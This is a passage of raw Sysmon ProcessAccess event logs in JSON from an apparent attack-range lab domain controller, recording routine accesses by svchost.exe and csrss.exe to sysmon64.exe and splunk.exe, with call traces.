07:55:31.813","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00101B580500}","TargetProcessId":"4584","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3195,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.813\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.813","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3196,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.813\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.813","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3197,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.813\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.813","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3198,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.813\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.813","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3199,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.813\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.813","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3200,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.813\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.813","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3201,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.813\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.813","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:55:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:55:31","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3202,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:55:31.813\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:55:31.813","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM3